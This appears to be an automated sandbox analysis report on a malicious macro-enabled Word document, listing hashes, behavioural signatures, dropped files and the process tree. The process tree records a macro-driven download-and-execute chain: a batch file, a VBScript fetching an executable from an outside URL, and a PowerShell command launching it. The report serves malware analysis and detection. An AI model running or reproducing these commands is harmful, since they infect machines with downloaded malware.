Overview

overview

10

Static

static

8

3b9c6e35c9...9.docm

windows7_x64

10

3b9c6e35c9...9.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    105s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    25-05-2022 00:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559.docm

  • Size

    630KB

  • MD5

    5bed84434cf10693e9928c949dc990ee

  • SHA1

    2247d45b53195863c4361f81e4b7facfedb9f33b

  • SHA256

    3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559

  • SHA512

    a1dc22e6dad75603d096db8834012fb7b952126e908206650b261dd461cd098bd79b171d8374a80e89f53796b382a96f2f86b765fdabaa2b40f3283fd2e8b574

Score
10/10
phishing

Malware Config

Signatures

  • Detected phishing page
    phishing
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3b9c6e35c90a3ef5f90cbecd6ad257d4d296832b00ef7dff00ecfabae4206559.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1044
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\DiskDrive\1\Volume\errorfix.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1780
      • C:\Windows\SysWOW64\cscript.exe
        cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://ventilator-aer.ro/wp-content/uploads/2020/02/0303/ginndoe.jp C:\DiskDrive\1\Volume\BackFiles\ZXTRTU.exe
        3⤵
        • Blocklisted process makes network request
        PID:1148
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\ZXTRTU.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1744
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:740

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\DiskDrive\1\Volume\BackFiles\ZXTRTU.exe
      Filesize

      2KB

      MD5

      752b20d2159ddc689eb9deaa771a095b

      SHA1

      307772a0bed3fbf19166493cad7d305d30cb7b2a

      SHA256

      041ca869d8c500b245a1b32c330507351913f544e12f608b6d583eadb0f09507

      SHA512

      b1d1be1e050247951dc8b50bb625053ca2434d4db1e1f2d897238911d5068e88429ddccb373591b9d0d6bfdb4864d50853be0d8ab7044cecda954dfb7f67a76f

      Download Submit
    • C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs
      Filesize

      777B

      MD5

      aaa0e8aad75d0ff7247f8a389d9e1b1c

      SHA1

      1e735b3ddb654cbefaa0fff7c2d8c8812dbaaf16

      SHA256

      e1722cf4f9d9fff3e3b9bbc825c7d88256e8db18df1c125aeee6346a85ad1c3a

      SHA512

      a75327cfcfb27cf8ade0ded3191eb4129490792dbc5058424a552e492abc96e31806ddd99fc64797e0d46a6dc816c913e7ec4e07f99a6747166237328608f125

      Download Submit
    • C:\DiskDrive\1\Volume\errorfix.bat
      Filesize

      2KB

      MD5

      45e1c5c5bdd874c41b6316b196533bf0

      SHA1

      e4cce2e1c47cb439116b5ace0e9a231b83c4c7c7

      SHA256

      f9c76220ad7a43ab310dec13c868a8ae55fac4328b5322ea4945e23323abe574

      SHA512

      185e5a7c77d5ce063180a97df0c09166b640adfd9e5fae0c18269f49101982b5b254cd9d92b7e15a8a6285bbc0b66a7ebb5e22f28ce867e141355c227e8ddd24

      Download Submit
    • memory/740-102-0x000007FEFBB11000-0x000007FEFBB13000-memory.dmp
      Filesize

      8KB

      Download
    • memory/740-101-0x0000000000000000-mapping.dmp
      Download
    • memory/1044-63-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-61-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-71-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-70-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-69-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-68-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-67-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-66-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-65-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-64-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-74-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-54-0x0000000072601000-0x0000000072604000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1044-62-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-72-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-60-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-59-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-75-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-103-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1044-73-0x0000000000771000-0x0000000000775000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1044-55-0x0000000070081000-0x0000000070083000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1044-58-0x000000007106D000-0x0000000071078000-memory.dmp
      Filesize

      44KB

      Download
    • memory/1044-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1044-57-0x0000000075441000-0x0000000075443000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1148-93-0x0000000000000000-mapping.dmp
      Download
    • memory/1744-99-0x000000006A3A0000-0x000000006A94B000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/1744-98-0x0000000004B40000-0x0000000005076000-memory.dmp
      Filesize

      5.2MB

      Download
    • memory/1744-96-0x0000000000000000-mapping.dmp
      Download
    • memory/1780-91-0x0000000000000000-mapping.dmp
      Download